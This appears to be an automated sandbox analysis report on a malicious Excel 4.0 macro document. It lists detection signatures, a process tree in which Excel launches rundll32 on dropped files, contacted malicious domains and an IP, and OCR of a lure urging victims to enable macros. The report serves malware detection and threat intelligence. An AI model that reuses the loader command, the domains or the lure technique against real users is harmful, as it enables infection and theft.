Loading ...

Play interactive tourEdit tour

Windows Analysis Report diagram-1878769052.xls

Overview

General Information

Sample Name:diagram-1878769052.xls
Analysis ID:441941
MD5:5dc0dbb9a817db4a5f589f670c6b9241
SHA1:6e51ed7744080f5583beb20fd7052e2fcbf7cd3a
SHA256:22c8c25451ead7742914a869f775af6e8751907a83b46077b8439d03a9105c81
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Outdated Microsoft Office dropper detected
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 7076 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 1288 cmdline: rundll32 ..\durio.fur,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1076 cmdline: rundll32 ..\durio.fur1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
diagram-1878769052.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
    diagram-1878769052.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\durio.fur,DllRegisterServer, CommandLine: rundll32 ..\durio.fur,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7076, ProcessCommandLine: rundll32 ..\durio.fur,DllRegisterServer, ProcessId: 1288

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: diagram-1878769052.xlsReversingLabs: Detection: 38%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
      Source: unknownHTTPS traffic detected: 192.185.195.245:443 -> 192.168.2.4:49736 version: TLS 1.2

      Software Vulnerabilities:

      barindex
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
      Source: global trafficDNS query: name: hallakjewelry.com
      Source: global trafficTCP traffic: 192.168.2.4:49736 -> 192.185.195.245:443
      Source: global trafficTCP traffic: 192.168.2.4:49736 -> 192.185.195.245:443

      Networking:

      barindex
      Outdated Microsoft Office dropper detectedShow sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDNS query: founderscirclecapital.eu is down
      Source: Joe Sandbox ViewIP Address: 192.185.195.245 192.185.195.245
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknownDNS traffic detected: queries for: hallakjewelry.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://api.aadrm.com/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://api.cortana.ai
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://api.office.net
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://api.onedrive.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://augloop.office.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://cdn.entity.
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://clients.config.office.net/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://config.edge.skype.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://cortana.ai
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://cortana.ai/api
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://cr.office.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://dev.cortana.ai
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://devnull.onenote.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://directory.services.
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://graph.windows.net
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://graph.windows.net/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://lifecycle.office.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://login.windows.local
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://management.azure.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://management.azure.com/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://messaging.office.com/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://ncus.contentsync.
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://officeapps.live.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://onedrive.live.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://osi.office.net
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://outlook.office.com/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://outlook.office365.com/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://settings.outlook.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://staging.cortana.ai
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://store.office.com/addinstemplate
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://tasks.office.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://templatelogging.office.com/client/log
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://wus2.contentsync.
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: 3C836C47-4F20-4ACD-A373-FE45E87498F5.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownHTTPS traffic detected: 192.185.195.245:443 -> 192.168.2.4:49736 version: TLS 1.2

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable Editing , , 11 from the yellow bar above ,, .., ,, 12 RunDLL X 13" Once You have Enable
      Source: Screenshot number: 8Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
      Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above O ' WHY I CANNOT OPEN THIS DOCUMENT ? W You are using
      Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
      Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
      Source: Document image extraction number: 12Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
      Source: Document image extraction number: 12Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: diagram-1878769052.xlsInitial sample: EXEC
      Source: diagram-1878769052.xlsInitial sample: CALL
      Found abnormal large hidden Excel 4.0 Macro sheetShow sources
      Source: diagram-1878769052.xlsInitial sample: Sheet size: 8119
      Source: classification engineClassification label: mal84.troj.expl.evad.winXLS@5/7@2/1
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{27A7763A-5A5B-41B8-BD81-3458C7640B91} - OProcSessId.datJump to behavior
      Source: diagram-1878769052.xlsOLE indicator, Workbook stream: true
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\durio.fur,DllRegisterServer
      Source: diagram-1878769052.xlsReversingLabs: Detection: 38%
